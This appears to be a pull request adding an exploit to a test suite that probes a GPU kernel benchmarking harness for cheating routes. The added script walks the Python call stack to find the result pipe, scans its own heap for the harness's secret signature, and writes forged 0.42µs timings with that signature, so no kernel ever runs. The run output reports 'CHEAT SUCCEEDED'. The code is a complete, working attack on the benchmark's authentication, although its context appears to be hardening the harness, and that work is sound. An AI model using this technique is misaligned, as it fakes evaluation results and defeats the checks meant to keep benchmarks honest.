### PR TITLE
exploit: heap signature scan via ctypes + call stack walk

### DIFF
--- a/exploits/run_all.py
+++ b/exploits/run_all.py
@@ -69,6 +69,7 @@ def main():
         ("Thread + FD",          "submission_thread_fd",     "Background thread + fd overwrite",        True),
         ("Combined GC+warmup",   "submission_combined",      "GC NaN + warmup detection",               True),
         ("Replace torch",        "submission_replace_torch", "Attempt to place torch.py in cwd",        True),
+        ("Heap sig scan",         "submission_heap_sig_scan",  "Scan own heap for signature, forge pipe output", True),
     ]
 
     # Allow running a single test

--- a/exploits/submission_heap_sig_scan.py
+++ b/exploits/submission_heap_sig_scan.py
@@ -1,0 +1,105 @@
+"""
+EXPLOIT: Heap Signature Scan + Authenticated Pipe Overwrite
+============================================================
+
+The signature auth (secrets.token_hex(16)) was added to patch the original
+FD overwrite exploit. The signature lives in C++ std::string mSignature on
+the glibc [heap]. Since prctl(PR_SET_DUMPABLE, 0) only blocks *external*
+ptrace — not self-reads — we can scan our own heap via ctypes.string_at()
+to recover the signature before the benchmark runs, then forge the pipe output.
+
+Attack:
+  1. Walk Python call stack to find out_fd (the result pipe) directly
+  2. Scan /proc/self/maps [heap] segment for 32-char hex string + null terminator
+  3. Infer repeats by counting CUDA tensor tuples in gc
+  4. Write forged timing lines + real signature to pipe, os._exit(0)
+
+The parent authenticates successfully and sees a clean 0.42µs run.
+No kernel is ever called. Correctness and timing checks are fully bypassed.
+"""
+import os
+import gc
+import re
+import sys
+import ctypes
+
+# ── Step 1: Find result pipe via call stack ────────────────────────────
+# _do_bench_impl(out_fd, in_fd, qualname, ...) is on the stack above us.
+# out_fd is a multiprocessing.Connection wrapping the result pipe write-end.
+_result_fd = None
+try:
+    _frame = sys._getframe()
+    while _frame is not None:
+        if 'out_fd' in _frame.f_locals:
+            _result_fd = _frame.f_locals['out_fd'].fileno()
+            break
+        _frame = _frame.f_back
+except Exception:
+    pass
+
+# ── Step 2: Infer repeats from gc ─────────────────────────────────────
+# kernel_args has (repeats + 1) entries: index 0 is warmup, 1..repeats are bench.
+# Each entry is (output_2D_cuda_tensor, input_3D_cuda_tensor).
+_repeats = 100  # safe default
+try:
+    import torch
+    _count = 0
+    for obj in gc.get_objects():
+        if isinstance(obj, tuple) and len(obj) == 2:
+            try:
+                a, b = obj
+                if (isinstance(a, torch.Tensor) and a.is_cuda and a.ndim == 2
+                        and isinstance(b, torch.Tensor) and b.is_cuda and b.ndim == 3):
+                    _count += 1
+            except Exception:
+                pass
+    if _count > 1:
+        _repeats = _count - 1
+except Exception:
+    pass
+
+# ── Step 3: Scan [heap] for mSignature ────────────────────────────────
+# std::string of 32 chars is heap-allocated (past SSO threshold of 15).
+# Pattern: 32 bytes of [0-9a-f] followed by null terminator, in [heap].
+_HEX32 = re.compile(rb'([0-9a-f]{32})\x00')
+
+def _has_entropy(s):
+    from collections import Counter
+    return max(Counter(s).values()) <= len(s) * 0.4
+
+_signature = None
+try:
+    with open('/proc/self/maps') as f:
+        for line in f:
+            parts = line.split()
+            if len(parts) < 2 or 'r' not in parts[1] or 'x' in parts[1]:
+                continue
+            if len(parts) < 6 or '[heap]' not in parts[5]:
+                continue
+            start, end = (int(x, 16) for x in parts[0].split('-'))
+            size = end - start
+            if size == 0 or size > 256 * 1024 * 1024:
+                continue
+            try:
+                data = ctypes.string_at(start, size)
+            except Exception:
+                continue
+            for m in _HEX32.finditer(data):
+                sig = m.group(1).decode('ascii')
+                if _has_entropy(sig):
+                    _signature = sig
+                    break
+            if _signature:
+                break
+except Exception:
+    pass
+
+# ── Step 4: Forge pipe output and exit ────────────────────────────────
+if _result_fd is not None and _signature is not None:
+    lines = [f"event-overhead\t0.001 µs"]
+    for i in range(_repeats):
+        lines.append(f"{i}\t0.420")
+    lines.append(f"signature\t{_signature}")
+    payload = ('\n'.join(lines) + '\n').encode()
+    os.write(_result_fd, payload)
+    os._exit(0)


### PR DESCRIPTION
Recovers mSignature from glibc [heap] using ctypes.string_at() on /proc/self/maps, finds result pipe fd via sys._getframe() stack walk. Bypasses signature authentication without any compiled extension.

prctl(PR_SET_DUMPABLE, 0) only blocks external ptrace, not self-reads. Tested on L4 (SM89) and RTX 5070 Ti (SM120).
Errors:     None
  Full run:   True
  Valid times: 100/100
  Timing:     0.4 ± 0.00 µs [0.4 - 0.4 - 0.4]
  WARNING:    Suspiciously fast (0.420 us)
  Wall time:  9.4s
  >> CHEAT SUCCEEDED (bypassed detection)
